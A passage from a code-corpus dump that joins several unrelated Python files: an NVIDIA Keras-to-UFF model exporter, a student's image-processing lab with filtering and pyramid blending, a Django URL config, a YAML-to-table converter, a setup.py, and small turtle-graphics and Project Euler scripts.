inputs, padding, fields\n\n def compose_call(prev_call_method):\n def call(self, inputs, training=False):\n return prev_call_method(self, inputs, training)\n\n return call\n\n def dropout_patch_call(self, inputs, training=False):\n # Just return the input tensor. Keras will map this to ``keras.backend.identity``,\n # which the TensorRT 3.0 UFF parser supports.\n return inputs\n\n # Patch BatchNormalization and Dropout call methods so they don't create\n # the training part of the graph.\n prev_batchnorm_call = keras.layers.normalization.BatchNormalization.call\n prev_dropout_call = keras.layers.Dropout.call\n\n logger.debug(\"Patching keras BatchNormalization...\")\n keras.layers.normalization.BatchNormalization.call = compose_call(\n prev_batchnorm_call\n )\n\n logger.debug(\"Patching keras Dropout...\")\n keras.layers.Dropout.call = dropout_patch_call\n\n logger.debug(\"Patching UFF TensorFlow converter apply_fused_padding...\")\n uff.converters.tensorflow.converter.TensorFlowToUFFConverter.apply_fused_padding = (\n apply_fused_padding\n )\n\n # Reload the model.\n model = keras.models.load_model(\n tmp_model_file_name, compile=False, custom_objects=custom_objects\n )\n\n # Unpatch Keras.\n logger.debug(\"Unpatching keras BatchNormalization layer...\")\n keras.layers.normalization.BatchNormalization.call = prev_batchnorm_call\n\n logger.debug(\"Unpatching keras Dropout layer...\")\n keras.layers.Dropout.call = prev_dropout_call\n\n # Delete temp file.\n os.remove(tmp_model_file_name)\n\n return model\n\n\ndef keras_to_pb(model, output_filename, output_node_names, custom_objects=None):\n \"\"\"Export a Keras model to Protobuf format.\n\n The Protobuf format is a TensorFlow-specific representation\n of the model.\n\n NOTE: the current Keras session is cleared in this function.\n Do not use this function during training.\n\n Args:\n model (Model): Keras model to export.\n output_filename (str): file to write exported model to.\n output_node_names (list of str): list of model output node names as\n returned by model.layers[some_idx].get_output_at(0).name.split(':')[0].\n If None, then the model output layers are used as output nodes.\n custom_objects (dict): dictionary mapping names (strings) to custom\n classes or functions to be considered during deserialization for export.\n Returns:\n tuple:\n in_tensor_name(s): The name(s) of the input nodes. If there is only one name, it will be\n returned as a single string, otherwise a list of strings.\n out_tensor_name(s): The name(s) of the output nodes. If there is only one name, it will be\n returned as a single string, otherwise a list of strings.\n in_tensor_shape(s): The shape(s) of the input tensors for this network. If there is only\n one input tensor, it will be returned as a single list, otherwise\n a list>.\n \"\"\"\n model = _reload_model_for_inference(model, custom_objects=custom_objects)\n\n layers_with_external_state_io = [\n layer for layer in model.layers if hasattr(layer, \"is_stateful\")\n ]\n\n def get_layer_name(layer):\n _layer_outputs = layer.get_output_at(0)\n if isinstance(_layer_outputs, list):\n return [lo.name.split(\":\")[0] for lo in _layer_outputs]\n return _layer_outputs.name.split(\":\")[0]\n\n # Get names of input and output nodes.\n in_tensors = model.inputs\n in_tensor_shape = keras.backend.int_shape(in_tensors[0])\n in_name = in_tensors[0].op.name\n\n if layers_with_external_state_io:\n in_name = [in_name]\n in_tensor_shape = [in_tensor_shape]\n for layer in layers_with_external_state_io:\n if layer.is_stateful:\n in_name.append(layer.state_input_name)\n else:\n # Add feature maps of past frames for stateless models\n in_name.extend(layer._past_feature_names)\n shape = layer.input_shape\n shape = shape if shape[0] is None or isinstance(shape[0], int) else shape[0]\n in_tensor_shape.append(shape)\n\n if output_node_names is None:\n output_node_names = [t.op.name for t in model.outputs]\n\n # Replace the sliced output node with original output layers. For example, an output node\n # named `sliced_output_cov/Sigmoid` will be replaced with `output_cov/Sigmoid`\n layer_output_names = [get_layer_name(layer) for layer in model.layers]\n original_output_names = []\n for name in output_node_names:\n # For each sliced output node, search its original node by name and use the original\n # node to replace the sliced output node.\n if name.startswith(\"sliced_output_\"):\n original_output_name_prefix = name.split(\"/\")[0][7:]\n original_output_names += [\n output_name\n for output_name in layer_output_names\n if output_name.startswith(original_output_name_prefix)\n ]\n else:\n original_output_names.append(name)\n output_node_names = original_output_names\n\n # Add output node names for the recurrent layers,\n # to handle the state external to TRT model.\n for layer in layers_with_external_state_io:\n if layer.is_stateful:\n temporal_output_node_name = get_layer_name(layer)\n else:\n temporal_output_node_name = layer.get_input_at(0).name.split(\":\")[0]\n if temporal_output_node_name not in output_node_names:\n output_node_names.append(temporal_output_node_name)\n\n # Freeze model.\n sess = keras.backend.get_session()\n\n # TensorFlow freeze_graph expects a comma separated string of output node names.\n output_node_names_tf = \",\".join(output_node_names)\n\n saver = saver_lib.Saver(write_version=saver_pb2.SaverDef.V2)\n\n # Save the checkpoint file to a temporary location.\n os_handle, tmp_ckpt_file_name = tempfile.mkstemp(suffix=\".ckpt\")\n os.close(os_handle)\n checkpoint_path = saver.save(sess, tmp_ckpt_file_name)\n graph_io.write_graph(sess.graph, \".\", output_filename)\n freeze_graph.freeze_graph(\n input_graph=output_filename,\n input_saver=\"\",\n input_binary=False,\n input_checkpoint=checkpoint_path,\n output_node_names=output_node_names_tf,\n restore_op_name=\"save/restore_all\",\n filename_tensor_name=\"save/Const:0\",\n output_graph=output_filename,\n clear_devices=False,\n initializer_nodes=\"\",\n )\n\n # Clean up.\n os.remove(tmp_ckpt_file_name)\n\n return in_name, output_node_names, in_tensor_shape\n\n\ndef pb_to_uff(input_filename, output_filename, out_names, text=False, quiet=True):\n \"\"\"Convert a TensorFlow model to UFF.\n\n The input model needs to be passed as a frozen Protobuf file.\n The export UFF model may be parsed and optimized by TensorRT.\n\n Args:\n input_filename (str): path to protobuf file.\n output_filename (str): file to write exported model to.\n out_names (list of str): list of the names of the output nodes.\n text (boolean): whether to save .pbtxt file.\n quiet (boolean): whether to enable quiet mode.\n \"\"\"\n uff.from_tensorflow_frozen_model(\n input_filename,\n out_names,\n output_filename=output_filename,\n text=text,\n quiet=quiet,\n )\n\n\ndef keras_to_uff(model, output_filename, output_node_names=None, custom_objects=None):\n \"\"\"Export a Keras model to UFF format.\n\n UFF stands for Universal Framework Format and is an NVIDIA\n TensorRT file format for storing a neural network's topology and\n weights.\n\n NOTE: the current Keras session is cleared in this function.\n Do not use this function during training.\n\n Args:\n model (Model): Keras model to export.\n output_filename (str): file to write exported model to.\n output_node_names (list of str): list of model output node names as\n returned by model.layers[some_idx].get_output_at(0).name.split(':')[0].\n If not provided, then the last layer is assumed to be the output node.\n custom_objects (dict): dictionary mapping names (strings) to custom\n classes or functions to be considered during deserialization for export.\n Returns:\n tuple:\n in_tensor_name(s): The name(s) of the input nodes. If there is only one name, it will be\n returned as a single string, otherwise a list of strings.\n out_tensor_name(s): The name(s) of the output nodes. If there is only one name, it will be\n returned as a single string, otherwise a list of strings.\n in_tensor_shape(s): The shape(s) of the input tensors for this network. If there is only\n one input tensor, it will be returned as a single list, otherwise\n a list>.\n\n These must be passed to the TensorRT optimization tool to identify input and output blobs.\n \"\"\"\n # First, convert model to a temporary TensorFlow Protobuf.\n if check_for_quantized_layers(model):\n calib_json = output_filename + \".json\"\n model, _ = process_quantized_layers(model, \"uff\", calib_json=calib_json)\n\n os_handle, tmp_pb_file_name = tempfile.mkstemp(suffix=\".pb\")\n os.close(os_handle)\n in_tensor_name, out_tensor_names, in_tensor_shapes = keras_to_pb(\n model, tmp_pb_file_name, output_node_names, custom_objects=custom_objects\n )\n\n # Second, convert protobuf to UFF.\n pb_to_uff(tmp_pb_file_name, output_filename, out_tensor_names)\n\n # Clean up.\n os.remove(tmp_pb_file_name)\n\n # Return a string instead of a list if there is only one output node.\n if len(out_tensor_names) == 1:\n out_tensor_names = out_tensor_names[0]\n\n return in_tensor_name, out_tensor_names, in_tensor_shapes\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/core/export/_uff.py","file_name":"_uff.py","file_ext":"py","file_size_in_byte":13039,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"7745681467","text":"import numpy as np\nfrom skimage import io\nimport os.path as osp\n\ndef load_image(file_name):\n \"\"\"\n Load image from disk\n :param file_name:\n :return: image: numpy.ndarray\n \"\"\"\n if not osp.exists(file_name):\n print('{} not exist'.format(file_name))\n return\n image = np.asarray(io.imread(file_name))\n if len(image.shape)==3 and image.shape[2]>3:\n image = image[:, :, :3]\n # print(image.shape) #should be (x, x, 3)\n return image\n\ndef save_image(image, file_name):\n \"\"\"\n Save image to disk\n :param image: numpy.ndarray\n :param file_name:\n :return:\n \"\"\"\n io.imsave(file_name,image)\n\ndef cs4243_resize(image, new_width, new_height):\n \"\"\"\n 5 points\n Implement the algorithm of nearest neighbor interpolation for image resize,\n Please round down the value to its nearest interger, \n and take care of the order of image dimension.\n :param image: ndarray\n :param new_width: int\n :param new_height: int\n :return: new_image: numpy.ndarray\n \"\"\"\n new_image = np.zeros((new_height, new_width, 3), dtype='uint8')\n if len(image.shape)==2:\n new_image = np.zeros((new_height, new_width), dtype='uint8')\n \n # ============= Your code here ============= #\n # Map each pixel in the new image with a pixel in the old image\n mapped_indices_i = np.floor(np.arange(new_height) * image.shape[0] / new_height).astype(np.int)\n mapped_indices_j = np.floor(np.arange(new_width) * image.shape[1] / new_width).astype(np.int)\n \n for i in range(new_height):\n for j in range(new_width):\n new_image[i, j] = image[mapped_indices_i[i], mapped_indices_j[j]]\n # ========================================= #\n return new_image\n\ndef cs4243_rgb2grey(image):\n \"\"\"\n 5 points\n Implement the rgb2grey function, use the\n weights for different channel: (R,G,B)=(0.299, 0.587, 0.114)\n Please scale the value to [0,1] by dividing 255\n :param image: numpy.ndarray\n :return: grey_image: numpy.ndarray\n \"\"\"\n if len(image.shape) != 3:\n print('RGB Image should have 3 channels')\n return\n \n # ============= Your code here ============= #\n # Matrix mult of image (Hi, Wi, 3) and weights (3, 1) ==> new image of (Hi, Wi, 1)\n weights = np.array([0.299, 0.587, 0.114])\n image = np.dot(image, weights)\n # ========================================= #\n\n return image/255.\n\ndef cs4243_histnorm(image, grey_level=256):\n \"\"\"\n 5 points \n Stretch the intensity value to [0, 255]\n :param image : ndarray\n :param grey_level\n :return res_image: hist-normed image\n Tips: use linear normalization here https://en.wikipedia.org/wiki/Normalization_(image_processing)\n \"\"\"\n res_image = image.copy()\n \n # ============= Your code here ============= #\n # Get global min and max intensity value\n min_level = res_image.min()\n max_level = res_image.max()\n \n # Normalizes the intensity values to [0, grey_level - 1]\n res_image = (res_image - min_level) / (max_level - min_level) * (grey_level - 1)\n # ========================================= #\n \n return res_image\n\n\n\ndef cs4243_histequ(image, grey_level=256):\n \"\"\"\n 10 points\n Apply histogram equalization to enhance the image.\n the cumulative histogram will aso be returned and used in the subsequent histogram matching function.\n :param image: numpy.ndarray(float64)\n :return: ori_hist: histogram of original image\n :return: cum_hist: cumulated hist of original image, pls normalize it with image size.\n :return: res_image: image after being applied histogram equalization.\n :return: uni_hist: histogram of the enhanced image.\n Tips: use numpy buildin funcs to ease your work on image statistics\n \"\"\"\n # ============= Your code here ============= #\n ori_hist = np.histogram(image, grey_level, (0, grey_level - 1))[0]\n cum_hist = np.cumsum(ori_hist) / (image.shape[0] * image.shape[1])\n uniform_hist = (grey_level - 1) * cum_hist\n # ========================================= #\n\n # Set the intensity of the pixel in the raw image to its corresponding new intensity \n height, width = image.shape\n res_image = np.zeros(image.shape, dtype='uint8') # Note the type of elements\n for i in range(height):\n for j in range(width):\n res_image[i,j] = uniform_hist[image[i,j]]\n \n uni_hist = np.bincount(res_image.flatten(), minlength=grey_level)\n return ori_hist, cum_hist, res_image, uni_hist\n \ndef cs4243_histmatch(ori_image, refer_image):\n \"\"\"\n 10 points\n Map value according to the difference between cumulative histogram.\n Note that the cum_hists of the two images can be very different. It is possible\n that a given value cum_hist[i] != cum_hist[j] for all j in [0,255]. In this case, please\n map to the closest value instead. if there are multiple intensities meet the requirement,\n choose the smallest one.\n :param ori_image #image to be processed\n :param refer_image #image of target gray histogram \n :return: ori_hist: histogram of original image\n :return: ref_hist: histogram of reference image\n :return: res_image: image after being applied histogram matching.\n :return: res_hist: histogram of the enhanced image.\n Tips: use cs4243_histequ to help you\n \"\"\"\n \n # ============= Your code here ============= #\n def find_nearest(array, value):\n array = np.asarray(array)\n idx = (np.abs(array - value)).argmin()\n return array[idx]\n\n # Get PDF, CDF for original and ref images (x_axis = intensity val, y_axis = cumulative density)\n grey_level = 256\n ori_hist, cum_hist_ori, _, _ = cs4243_histequ(ori_image, grey_level)\n ref_hist, cum_hist_ref, _, _ = cs4243_histequ(refer_image, grey_level)\n\n # Get proportion to intensity value mapping of refer image\n p2i_ref = {}\n for intensity_val, proportion in enumerate(cum_hist_ref):\n if proportion not in p2i_ref:\n p2i_ref[proportion] = intensity_val\n\n map_value = np.zeros(grey_level, dtype='uint8')\n for intensity_val, proportion in enumerate(cum_hist_ori):\n if proportion not in p2i_ref:\n # Find the nearest value if there is no exact match\n proportion = find_nearest(cum_hist_ref, proportion)\n\n map_value[intensity_val] = p2i_ref[proportion]\n # ========================================= #\n \n # Set the intensity of the pixel in the raw image to its corresponding new intensity \n height, width = ori_image.shape\n res_image = np.zeros(ori_image.shape, dtype='uint8') # Note the type of elements\n for i in range(height):\n for j in range(width):\n res_image[i,j] = map_value[ori_image[i,j]]\n \n res_hist = np.bincount(res_image.flatten(), minlength=256)\n \n return ori_hist, ref_hist, res_image, res_hist\n\n\ndef cs4243_rotate180(kernel):\n \"\"\"\n Rotate the matrix by 180. \n Can utilize build-in Funcs in numpy to ease your work\n :param kernel:\n :return:\n \"\"\"\n kernel = np.flip(np.flip(kernel, 0),1)\n return kernel\n\ndef cs4243_gaussian_kernel(ksize, sigma):\n \"\"\"\n 5 points\n Implement the simplified Gaussian kernel below:\n k(x,y)=exp(((x-x_mean)^2+(y-y_mean)^2)/(-2sigma^2))\n Make Gaussian kernel be central symmentry by moving the \n origin point of the coordinate system from the top-left\n to the center. Please round down the mean value. In this assignment,\n we define the center point (cp) of even-size kernel to be the same as that of the nearest\n (larger) odd size kernel, e.g., cp(4) to be same with cp(5).\n :param ksize: int\n :param sigma: float\n :return kernel: numpy.ndarray of shape (ksize, ksize)\n \"\"\"\n kernel = np.zeros((ksize, ksize))\n \n # ============= Your code here ============= #\n x_mean = y_mean = ksize // 2\n for i in range(ksize):\n for j in range(ksize):\n kernel[i, j] = np.exp(((i - x_mean) ** 2 + (j - y_mean) ** 2) / (-2 * (sigma ** 2)))\n # ========================================= #\n\n return kernel / kernel.sum()\n\ndef cs4243_filter(image, kernel):\n \"\"\"\n 10 points\n Implement the convolution operation in a naive 4 nested for-loops,\n :param image: numpy.ndarray\n :param kernel: numpy.ndarray\n :return:\n \"\"\"\n Hi, Wi = image.shape\n Hk, Wk = kernel.shape\n filtered_image = np.zeros((Hi, Wi))\n\n # ============= Your code here ============= #\n kernel_center_i = Hk // 2\n kernel_center_j = Wk // 2\n \n # Implement convolution operation using L3 slide 29\n for i in range(Hi):\n for j in range(Wi):\n x_ij = 0\n for u in range(-kernel_center_i, kernel_center_i + 1):\n for v in range(-kernel_center_j, kernel_center_j + 1):\n img_i = i - u\n img_j = j - v\n knl_i = kernel_center_i + u\n knl_j = kernel_center_j + v\n\n if img_i < 0 or img_i >= Hi or img_j < 0 or img_j >= Wi:\n continue\n\n f_uv = kernel[knl_i, knl_j]\n p_ij = image[img_i, img_j]\n x_ij += f_uv * p_ij\n\n filtered_image[i, j] = x_ij\n # ========================================= #\n\n return filtered_image\n\ndef pad_zeros(image, pad_height, pad_width):\n \"\"\"\n Pad the image with zero pixels, e.g., given matrix [[1]] with pad_height=1 and pad_width=2, obtains:\n [[0 0 0 0 0]\n [0 0 1 0 0]\n [0 0 0 0 0]]\n :param image: numpy.ndarray\n :param pad_height: int\n :param pad_width: int\n :return padded_image: numpy.ndarray\n \"\"\"\n height, width = image.shape\n new_height, new_width = height+pad_height*2, width+pad_width*2\n padded_image = np.zeros((new_height, new_width))\n padded_image[pad_height:new_height-pad_height, pad_width:new_width-pad_width] = image\n return padded_image\n\ndef cs4243_filter_fast(image, kernel):\n \"\"\"\n 10 points\n Implement a fast version of filtering algorithm.\n take advantage of matrix operation in python to replace the \n inner 2-nested for loops in filter function.\n :param image: numpy.ndarray\n :param kernel: numpy.ndarray\n :return filtered_image: numpy.ndarray\n Tips: You may find the functions pad_zeros() and cs4243_rotate180() useful\n \"\"\"\n Hi, Wi = image.shape\n Hk, Wk = kernel.shape\n filtered_image = np.zeros((Hi, Wi))\n\n # ============= Your code here ============= #\n kernel_center_i = Hk // 2\n kernel_center_j = Wk // 2\n\n image = pad_zeros(image, kernel_center_i, kernel_center_j)\n kernel = cs4243_rotate180(kernel)\n \n for i in range(Hi):\n for j in range(Wi):\n target = image[i:i+Hk, j:j+Wk]\n filtered_image[i, j] = np.sum(target * kernel)\n # ========================================= #\n\n return filtered_image\n\ndef cs4243_filter_faster(image, kernel):\n \"\"\"\n 10 points\n Implement a faster version of filtering algorithm.\n Pre-extract all the regions of kernel size,\n and obtain a matrix of shape (Hi*Wi, Hk*Wk),also reshape the flipped\n kernel to be of shape (Hk*Wk, 1), then do matrix multiplication, and rehshape back\n to get the final output image.\n :param image: numpy.ndarray\n :param kernel: numpy.ndarray\n :return filtered_image: numpy.ndarray\n Tips: You may find the functions pad_zeros() and cs4243_rotate180() useful\n \"\"\"\n Hi, Wi = image.shape\n Hk, Wk = kernel.shape\n filtered_image = np.zeros((Hi, Wi))\n\n # ============= Your code here ============= #\n kernel = cs4243_rotate180(kernel).flatten()\n kernel_center_i = Hk // 2\n kernel_center_j = Wk // 2\n image = pad_zeros(image, kernel_center_i, kernel_center_j)\n \n regions = []\n for i in range(Hi):\n for j in range(Wi):\n target = image[i:i+Hk, j:j+Wk]\n regions.append(target)\n regions = np.array(regions).reshape((Hi*Wi, Hk*Wk)) \n filtered_image = np.dot(regions, kernel).reshape((Hi, Wi))\n # ========================================= #\n\n return filtered_image\n\ndef cs4243_downsample(image, ratio):\n \"\"\"\n Downsample the image to its 1/(ratio^2),which means downsample the width to 1/ratio, and the height 1/ratio.\n for example:\n A = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\n B = downsample(A, 2)\n B=[[1, 3], [7, 9]]\n :param image:numpy.ndarray\n :param ratio:int\n :return:\n \"\"\"\n width, height = image.shape[1], image.shape[0]\n return image[0:height:ratio, 0:width:ratio]\n\ndef cs4243_upsample(image, ratio):\n \"\"\"\n upsample the image to its 2^ratio, \n :param image: image to be upsampled\n :param kernel: use same kernel to get approximate value for additional pixels\n :param ratio: which means upsample the width to ratio*width, and height to ratio*height\n :return res_image: upsampled image\n \"\"\"\n width, height = image.shape[1], image.shape[0]\n new_width, new_height = width*ratio, height*ratio\n res_image = np.zeros((new_height, new_width))\n res_image[0:new_height:ratio, 0:new_width:ratio] = image\n return res_image\n\n\ndef cs4243_gauss_pyramid(image, n=3):\n \"\"\"\n 10 points\n build a Gaussian Pyramid of level n\n :param image: original grey scaled image\n :param n: level of pyramid\n :return pyramid: list, with list[0] corresponding to original image.\n\t:e.g., img0->blur&downsample->img1->blur&downsample->img2\t\n Tips: you may need to call cs4243_gaussian_kernel() and cs4243_filter_faster()\n\tThe kernel for blur is given, do not change it.\n \"\"\"\n kernel = cs4243_gaussian_kernel(7, 1)\n pyramid = []\n \n # ============= Your code here ============= #\n pyramid.append(image)\n for i in range(n):\n temp_image = cs4243_filter_faster(pyramid[i], kernel)\n temp_image = cs4243_downsample(temp_image, 2)\n pyramid.append(temp_image)\n # ========================================= #\n \n return pyramid\n\ndef cs4243_lap_pyramid(gauss_pyramid):\n \"\"\"\n 10 points\n build a Laplacian Pyramid from the corresponding Gaussian Pyramid\n :param gauss_pyramid: list, results of cs4243_gauss_pyramid\n :return lap_pyramid: list, with list[0] corresponding to image at level n-1 in Gaussian Pyramid.\n\tTips: The kernel for blurring during upsampling is given, you need to scale its value following the standard pipeline in laplacian pyramid.\n \"\"\"\n #use same Gaussian kernel \n\n kernel = cs4243_gaussian_kernel(7, 1)\n n = len(gauss_pyramid)\n lap_pyramid = [gauss_pyramid[n-1]] # the top layer is same as Gaussian Pyramid\n \n # ============= Your code here ============= #\n kernel = kernel * 4.0\n\n for i in reversed(range(n-1)):\n curr_lvl = gauss_pyramid[i+1]\n curr_lvl = cs4243_upsample(curr_lvl, 2)\n curr_lvl = cs4243_filter_faster(curr_lvl, kernel)\n\n prev_lvl = gauss_pyramid[i]\n lap_pyramid.append(prev_lvl - curr_lvl)\n # ========================================= #\n \n return lap_pyramid\n \ndef cs4243_Lap_blend(A, B, mask):\n \"\"\"\n 10 points\n blend image with Laplacian pyramid\n :param A: image on the left\n :param B: image on the right\n :param mask: mask [0, 1]\n :return blended_image: same size as input image\n Tips: use cs4243_gauss_pyramid() & cs4243_lap_pyramid() to help you\n \"\"\"\n kernel = cs4243_gaussian_kernel(7, 1)\n blended_image = None\n \n # ============= Your code here ============= #\n def reconstruct_lap_pyramid(lap_pyramid, kernel):\n # Scale kernel to compensate the 0s in the image after upsampling\n kernel = kernel * 4.0\n image = lap_pyramid[0]\n for i in range(1, len(lap_pyramid)):\n temp_image = cs4243_upsample(image, 2)\n temp_image = cs4243_filter_faster(temp_image, kernel)\n image = temp_image + lap_pyramid[i]\n return image\n \n la = cs4243_lap_pyramid(cs4243_gauss_pyramid(A))\n lb = cs4243_lap_pyramid(cs4243_gauss_pyramid(B))\n gr = list(reversed(cs4243_gauss_pyramid(mask)))\n \n lap_blended = []\n for a, b, ra in zip(la, lb, gr):\n blended = ra * a + (1.0 - ra) * b\n lap_blended.append(blended)\n\n blended_image = reconstruct_lap_pyramid(lap_blended, kernel)\n # ========================================= #\n \n return blended_image","repo_name":"alloystory/cs4243","sub_path":"Lab 1/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":16354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36802052724","text":"\"\"\"day24_myself URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom app01 import views\n\nurlpatterns = [\n url(r'^$', views.login),\n url(r'^index/$', views.index),\n url(r'^login/$', views.login),\n url(r'^reg/$', views.reg),\n url(r'^logout_v/$', views.logout_v),\n url(r'^admin/', admin.site.urls),\n\n url(r'^hosts/$', views.hosts),\n url(r'^hosts/add/$', views.hosts_add),\n url(r'^hosts/edit/(\\d+)/$', views.edit_host),\n url(r'^hosts/del/(\\d+)/$', views.delete_host),\n\n url(r'^users/$', views.users),\n url(r'^users/add/$', views.users_add),\n url(r'^users/del/(\\d+)/$', views.users_del),\n url(r'^users/edit/(\\d+)/$', views.users_edit),\n\n url(r'^test/$', views.test),\n]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"shengleqi/day24_myself","sub_path":"day24_myself/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35645939138","text":"# -*- coding: utf-8 -*-\nfrom os.path import splitext\nimport argparse\nimport yaml\nimport json\nfrom tabular.tabular import Tabular, MarkdownTabular, AsciiDocTabular\n\n\ndef set_config(args):\n tabular_cls = Tabular\n file_name = args.yml_file\n name, ext = splitext(file_name)\n out_ext = '.txt'\n if args.markdown:\n tabular_cls = MarkdownTabular\n out_ext = '.md'\n if args.asciidoc:\n tabular_cls = AsciiDocTabular\n out_ext = '.adoc'\n if args.csv:\n tabular_cls = Tabular\n out_ext = '.csv'\n\n file_parser = yaml\n if args.json or ext == 'json':\n file_parser = json\n output = args.output\n if not output:\n output = name + out_ext\n table_name = args.tablename\n if not table_name:\n table_name = name\n return file_name, file_parser, tabular_cls, output, table_name\n\n\ndef run(args):\n file_name, file_parser, tabular_cls, output, table_name = set_config(args)\n with open(file_name, 'r') as yml_file:\n data = file_parser.load(yml_file)\n t = tabular_cls.from_dict(data, table_name=table_name)\n result = t.render()\n with open(output, 'w') as out:\n out.write(result)\n print('output into {}'.format(output))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='convert yaml file into tabular text(csv, markdown, AsciiDoc)')\n parser.add_argument('yml_file', help='target yaml file to convert')\n parser.add_argument('-o', '--output',\n help='output file name. If no designation, replace file extension following table style')\n parser.add_argument('-t', '--tablename', help='set table name (default: file name base)')\n parser.add_argument('-j', '--json', action='store_true', default=0, help='json file convert mode')\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-md', '--markdown', action='store_true', default=1, help='as markdown style')\n group.add_argument('-ad', '--asciidoc', action='store_true', default=0, help='as AsciiDoc style')\n group.add_argument('--csv', action='store_true', default=0, help='as csv style')\n\n run(parser.parse_args())","repo_name":"ta-dadadada/yamltotable","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4847090800","text":"import os\nfrom typing import List\n\nfrom setuptools import find_packages, setup\n\nimport versioneer\n\nPATH_ROOT = os.path.dirname(__file__)\n\n\ndef _load_requirements(path_dir: str, file_name: str) -> List[str]:\n with open(os.path.join(path_dir, file_name), \"r\") as file:\n lines = [ln.strip() for ln in file.readlines()]\n reqs = list()\n for line in lines:\n if line.startswith(\"#\"):\n continue\n else:\n reqs.append(line)\n return reqs\n\n\nsetup(\n name=\"washing-learning\",\n version=versioneer.get_version(),\n cmdclass=versioneer.get_cmdclass(),\n author=\"Lucas Robinet\",\n author_email=\"lucas.robinet@yahoo.com\",\n description=\"Machine Learning Toolbox\",\n long_description=open(\"README.md\", \"r\").read(),\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/Lucas-rbnt/washing-learning\",\n license=\"Apache-2.0\",\n packages=find_packages(exclude=[\"examples\", \"examples.*\", \"tests\", \"tests.*\"]),\n install_requires=_load_requirements(\n path_dir=os.path.join(PATH_ROOT), file_name=\"requirements.txt\"\n ),\n extras_requires={\n \"dev\": _load_requirements(\n path_dir=os.path.join(PATH_ROOT), file_name=\"requirements-dev.txt\"\n ),\n \"doc\": _load_requirements(\n path_dir=os.path.join(PATH_ROOT), file_name=\"requirements-doc.txt\"\n ),\n },\n)\n","repo_name":"Lucas-rbnt/washing-learning","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17815524265","text":"import turtle\n\ndef draw_shapes():\n\n # Setting a window with the background colored red\n window = turtle.Screen()\n window.bgcolor('red')\n\n # Move a turtle named brad forward\n brad = turtle.Turtle()\n\n # Customize the turtle\n brad.shape(\"turtle\")\n brad.color('yellow')\n brad.speed(2)\n\n # Turn Brad right 90 degrees and move forward x 4\n for i in range(4):\n brad.forward(100)\n brad.right(90)\n\n # Add another turtle named angie\n angie = turtle.Turtle()\n\n # Customize angie\n angie.shape(name='arrow')\n angie.color('blue')\n\n # angie, draw a circle\n angie.circle(100)\n\n # Add the third turtle named charles\n charles = turtle.Turtle()\n\n # Customize charles\n charles.shape(name='turtle')\n charles.color('green')\n\n # charles, draw a triangle\n for i in range(3):\n charles.back(100)\n charles.right(120)\n\n window.exitonclick()\n\ndraw_shapes()\n","repo_name":"chukycheese/udacity_courses","sub_path":"programming_foundations_with_python/3_use_classes_draw_turtles/11_improving_code_quality.py","file_name":"11_improving_code_quality.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8580705846","text":"\ndef isPandigital(n):\n return set(str(n)) == set('0123456789')\n\ndef solve(n):\n count = 0\n def _solve(x, d, m):\n nonlocal count\n if m == 0:\n if isPandigital(x):\n count += 1\n else:\n if d == 0:\n _solve(10*x + 1, 1, m-1)\n elif d == 9:\n _solve(10*x + 8, 8, m-1)\n else:\n _solve(10*x + d-1, d-1, m-1)\n _solve(10*x + d+1, d+1, m-1)\n for i in range(1, 10):\n _solve(i, i, n-1)\n return count\n\nfor i in range(10, 25):\n print('i=' + str(i) + ', ' + str(solve(i)))\n \n","repo_name":"tyama711/competitive","sub_path":"ProjectEuler/Problem178/p178.py","file_name":"p178.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14817029693","text":"import cv2\nimport numpy as np\n\n\ndef nichika(img, th=128):\n ind0 = np.where(img < th)\n ind1 = np.where(img >= th)\n img[ind0] = 0\n img[ind1] = 1\n\n return img\n\ndef Renketsu(img):\n Ver, Hor = img.shape\n img = np.pad(img, ([1, 1], [1, 1]), 'edge')\n result = np.zeros((Ver+1, Hor+1, 3))\n\n for x in range(1, Hor+1):\n for y in range(1, Ver+1):\n if img[y, x] != 0:\n s1 = img[y, x+1] - (img[y, x+1] * img[y-1, x+1] * img[y-1, x])\n s2 = img[y-1, x] - (img[y-1, x] * img[y-1, x-1] * img[y, x-1])\n s3 = img[y, x-1] - (img[y, x-1] * img[y+1, x-1] * img[y+1, x])\n s4 = img[y+1, x] - (img[y+1, x] * img[y+1, x+1] * img[y, x+1])\n S = s1 + s2 + s3 + s4\n\n if S == 0:\n result[y,x] = [0, 0, 255]\n elif S == 1:\n result[y,x] = [0, 255, 0]\n elif S == 2:\n result[y,x] = [255, 0, 0]\n elif S == 3:\n result[y,x] = [255, 255, 0]\n elif S == 4:\n result[y,x] = [255, 0, 255]\n\n return result[1:1+Ver, 